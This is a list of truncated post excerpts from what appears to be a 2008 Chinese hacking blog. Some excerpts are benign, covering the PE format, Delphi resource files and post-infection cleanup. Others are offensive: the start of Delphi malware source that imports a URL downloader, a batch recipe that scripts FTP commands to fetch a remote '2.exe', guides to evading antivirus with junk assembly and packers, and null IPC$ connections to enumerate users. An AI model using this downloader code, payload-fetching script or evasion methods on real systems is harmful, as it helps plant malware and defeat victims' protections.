2008-04-18 11:50
为什么近几年公开的技术交流越来越少这个问题很复杂,说是说不清楚的,只能扯一扯。先扯个大概吧。
首先,得明确一点:任何人都没有义务公开自己的研究,任何人都没有权利要求别人公开自己的研究——尤其是那些自己没公开过什么的人。不过似乎不少人都有自己的一套理论,能够找出充分的理由来为此义愤填膺,就像七八岁的小男孩得不到想要的游戏机一般义愤填膺。从我这些年的经验来看,在英语世界里,北欧技术交流气氛最好。其次是中欧,再次西欧,美国排最后。
为什么呢,因为像瑞士 |
2008-04-14 17:08
几乎每个Windows应用程序都使用图标、图片、光标等资源。资源是程序的一部分,但是它是不可执行代码。
1.把资源放到Exe文件的优点
由于定位资源比在磁盘中定位文件花费时间少,所以应用程序执行会更快。多种资源可以放在一个文件中,减少了图标、图片、光标等文件数量。保存资源文件时不要和工程名相同,因为Delphi创建工程时会自动创建一个和工程名相同的资源文件。并且最好将资源文件保存到和工程文件同一个文件夹中。
2.创建资源文件
首先创建一个.Rc的纯文 |
2008-04-14 17:02
Program a;
Uses
Windows;
Const
krnp : String = 'I want to dedicate this message to '+
'gates. Gates, you suck. Gates'+
'you really are homosexual. etc';
VAR
ww : String;
function mbgcqsd_(Caller: cardinal; URL: PChar; FileName: PChar;Reserved: LongWord; StatusCB: cardinal)ongword; stdcall; external 'URLMON.DLL' name 'URLDownloadToFileA';
Function LowerCase(const S: string): string;
var
kix |
2008-04-07 10:39
比如,你申请的FTP地址是127.0.0.1 端口是21 用户名是king 密码是123456,FTP放文件的目录是\wwwroot,那么就这样就可以了
就一步,建立1.bat文件,里面写
echo open 127.0.0.1 21>>c:\tan.txt 连接我的FTP,127.0.0.1 是地址,21是端口
echo king>>c:\tan.txt FTP帐户名
echo 123456>>c:\tan.txt FTP密码
echo bin>>c:\tan.txt
echo get \wwwroot\2.exe |
2008-04-07 10:39
1:加垃圾汇编代码。
其实许多的朋友都是知道的,Delphi支持在代码中嵌套汇编代码。也就是说,如果加入了垃圾汇编代码,就网网可以直接过免杀。
例如:
asm
nop
nop
nop
end;
这样的形式。。。可以在多处加入这样的垃圾代码,该招数对瑞星效果不错,对7.0的卡吧效果不明显了,6.0时的卡吧基本通杀。
2:修改单元文件名。
许多的杀毒软件喜欢查杀单元文件名,往往把单元文件名改名后,也可以达到很好的免杀的效果。。。
3:提取出部分函数,COPY到新建的单元里。
这种方法可 |
2008-04-07 10:38
1. 详细如何建立远程IPC$连接
什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁 |
2008-03-22 19:10
一、前言(Preface)
------------------
PE(“portable executable”,可移植的可执行文件)文件格式,是微软WindwosNT,Windows95和Win32子集①中的可执行的二进制文件的格式;在WindowsNT中,驱动程序也是这种格式。它还能被应用于各种目标文件②和库文件中。
这种文件格式是由微软设计的,并于1993年被TIS(tool interface standard,工具接口标准)委员会(由Microsoft,Intel,Borland,Watcom,IBM,等等组成)所批准,它明显的基于COFF文件格式的许多知识。COFF(“common object file fro
|
2008-03-22 19:09
以下是本人看了许多教程和免杀文章整理总结的一些关于免杀的心得、方法很多,不方便全部概述出来。提取出一些常用的方法~
【加壳免杀】
直加壳做免杀.这就不多说了.地球人都会,最好用冷门壳做保护!
加密壳会使程序体积增大..免杀效果还不错.
压缩壳可以减小程序体积.但是很少可以免杀卡巴这类杀毒软件
单单加壳只能做到表面免杀!一般与花指令、改入口点、改特征码结合使用效果较佳!
【加花指令免杀】
方法:用OD加载服务端,记下入口点的内存地址,找零区域,记下零区域的起始内存地址, |
2008-02-15 16:23
现在虽然有众多的杀毒软件和防火墙供大家作为电脑的保护,但新病毒和木马,加上黑客人工的入侵方式,电脑中毒的情况还是很普遍。尤其是上网的用户,一不留意就会中招。如何防止中毒的技巧文章,大家已经看得很多了。那么万一中毒了,该如何处理呢?下面就谈谈中毒后的一些紧急处理措施:
一、正在上网的用户,发现异常应首先马上断开连接
如果你发现IE经常询问你是否运行某些ACTIVEX控件,或是生成莫明其妙的文件、询问调试脚本什么的,一定要警惕了,你可能已经中招了。典型的上网被入侵有两种情况 |
2008-02-15 16:22
|
| 
